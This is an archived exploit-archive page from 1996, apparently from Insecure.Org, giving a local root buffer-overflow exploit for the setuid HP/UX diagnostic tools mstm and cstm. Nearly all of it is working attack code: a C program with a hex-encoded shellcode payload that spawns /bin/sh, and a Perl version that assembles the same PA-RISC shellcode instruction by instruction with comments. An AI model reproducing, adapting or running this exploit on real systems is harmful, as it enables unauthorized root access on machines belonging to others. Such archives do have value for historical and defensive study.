SOD /usr/diag/bin/[cm]stm buffer overflow

Summary

Description:	Standard buffer overflow
Author:	Colonel Panic of SOD (sod@command.com.inter.net)
Compromise:	root (local)
Vulnerable Systems:	HP/UX with vulnerable [cm]stm, probably 9.x 10.x
Date:	November 1996
Notes:	See the SOD HP Bug of the Week page

Details

Exploit:


/* SOD /usr/diag/bin/[cm]stm buffer overflow */

main()
{
char buf[500];

strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");

execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
/* Either-or, same overflow */
execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
}

And here it is in perl:


#!/usr/bin/perl

# working exploit for 9.X setuid root /usr/diag/bin/[cm]stm

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

$code="AA"; # two byte alignment

$code.=h2cs("34010102"); # ldi 129,r1
$code.=h2cs("08220401"); # sub rp,r1,r1
$code.=h2cs("602002a6"); # stb r0,339(r1)
#$code.=h2cs("602002ac"); # stb r0,342(r1)
$code.=h2cs("b43a0298"); # addi 332,r1,arg0
$code.=h2cs("34160176"); # ldi 187,r22
$code.=h2cs("34010276"); # ldi 315,r1
$code.=h2cs("08360216"); # and r22,r1,r22
$code.=h2cs("20200801"); # ldil l%c0000004,r1
$code.=h2cs("e420e008"); # ble 4(sr7,r1)
$code.=h2cs("08210280"); # NOP == xor r1,r1,r0
#$code.=h2cs("deadcafe"); # illegal instruction
$num=208-length($code);
$code.="C"x$num;

$data="/bin/sh.sh.";
$num=16-length($data);
$data.="D"x$num;

$num=224-length($of);
$of=$code.$data;
$of.=h2cs("7b03301B");
print "Length is: ",length($of),"\n";
exec("/usr/diag/bin/mstm","-l","$of");

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: